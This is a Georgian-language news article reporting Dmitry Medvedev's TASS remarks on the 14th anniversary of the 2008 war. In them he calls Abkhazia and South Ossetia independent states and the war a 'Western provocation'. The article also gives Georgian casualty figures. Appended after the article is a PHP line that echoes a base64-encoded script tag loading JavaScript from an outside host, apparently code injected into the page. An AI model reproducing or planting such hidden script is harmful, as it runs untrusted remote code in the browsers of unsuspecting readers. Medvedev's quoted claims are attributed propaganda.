celsiusi
ავერსი საქკაბელი
რუსეთის უშიშროების საბჭოს მდივნის მოადგილე და ყოფილი პრეზიდენტი, დიმიტრი მედვედევი ამბობს, რომ მათთვის აფხაზეთი და სამხრეთ ოსეთი დამოუკიდებელი სახელმწიფოებია, რაც ასევე კარგად ესმის საქართველოს მთავრობას.
 
რუსულ სამთავრობო მედია TASS-თან ინტერვიუში მედვედევი ამბობს, რომ ომი საქართველოსა და უკრაინაში „დასავლეთის პროვოკაცია“ იყო და არა რუსეთის შეიარაღებული აგრესია. ის ასევე აცხადებს, რომ უკრაინასა და საქართველოს არც ნატოში და არც ევროკავშირში არ მიიღებენ. მედვედევი „ქართულ აგრესიად“ მოიხსენიებს 2008 წლის ომს.
 
„რაც შეეხება ხელახალ აგრესიას საქართველოს მხრიდან მისგან გამოყოფილ ტერიტორიებზე – ეს შეუძლებელია. ჩვენთვის დღეს აფხაზეთი და სამხრეთ ოსეთი – დამოუკიდებელი სახელმწიფოებია, რომელთანაც ჩვენ გვაქვს მეგობრული ურთიერთობა და სადაც განთავსებულია ჩვენი სამხედრო ბაზები. ეს კარგად ესმის საქართველოს ამჟამინდელ მთავრობას. ისინი ბედს აღარ ცდიან და აღარ შევლენ დაპირისპირებაში ისეთ სახელმწიფოსთან, როგორიცაა რუსეთი“, – აცხადებს მედვედევი.
 
დღეს, 2008 წლის ომის მე-14 წლისთავზე, მედვედევმა ასევე განაცხადა, რომ რომ 2008 წელი სიგნალი იყო აშშ-ის და NATO-სთვის , 2022-ში კი „უფრო მკაცრი პასუხის გაცემა მოუწიათ“
 
წელს 14 წელიწადი გავიდა 2008 წლის სამხედრო კონფლიქტის დაწყებიდან, რომელსაც „აგვისტოს ომის“ სახელით მოიხსენიებენ. ომი 5 დღე გაგრძელდა, რის შემდეგაც საქართველომ დაკარგა კონტროლი კოდორის ხეობასა და ახალგორის რაიონზე.
 
ოფიციალური ინფორმაციით, 2008 წლის აგვისტოში საქართველოში რუსეთის შეჭრის შედეგად დაღუპულია საქართველოს თავდაცვის სამინისტროს 169 მოსამსახურე, შინაგან საქმეთა სამინისტროს 14 თანამშრომელი და 224 სამოქალაქო პირი.
533
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");